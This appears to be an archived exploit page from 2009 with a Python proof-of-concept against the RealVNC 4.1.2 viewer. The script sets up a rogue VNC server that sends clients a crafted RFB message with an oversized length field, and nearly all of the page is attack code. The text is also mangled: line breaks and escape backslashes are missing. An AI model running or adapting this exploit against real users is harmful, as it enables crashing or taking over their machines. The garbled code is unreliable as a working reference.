
realvnc-exec.txt

Posted on 02 February 2009

#!/usr/bin/env python # POC: RealVNC 4.1.2 'vncviewer.exe' RFB Protocol Remote Code Execution Vulnerability, BID 30499 #Author: Andres Lopez Luksenberg <polakocai@gmail.com> # import socket serversocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM) serversocket.bind(('', 5900)) serversocket.listen(1) while True: clientsocket, clientaddres = serversocket.accept() data = 'RFB 003.008 ' clientsocket.sendall(data) data_cli = clientsocket.recv(1024) print data_cli data = 'x01x01' clientsocket.sendall(data) data_cli = clientsocket.recv(1024) print repr(data_cli) data = 'x00x00x00x00' clientsocket.sendall(data) data = 'x02xd0x01x77x08x08x00x00x00x07x00x07x00x03x00x03x06x00x00x00x00x00x00x13x4cx69x6ex75x78x56x4ex43x3ax20x2fx64x65x76x2fx74x74x79x32' clientsocket.sendall(data) data_cli = clientsocket.recv(1024) print repr(data_cli) data_cli = clientsocket.recv(1024) print repr(data_cli) data_cli = clientsocket.recv(1024) print repr(data_cli) data='x00x00x00x03x00x03x00x03x00x08x00x07' data = data + 'x00x00xffxff' #bug data = data + 'x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00xe7xe7x7ex3cx7exe7xe7' clientsocket.sendall(data) clientsocket.close() serversocket.close()

 
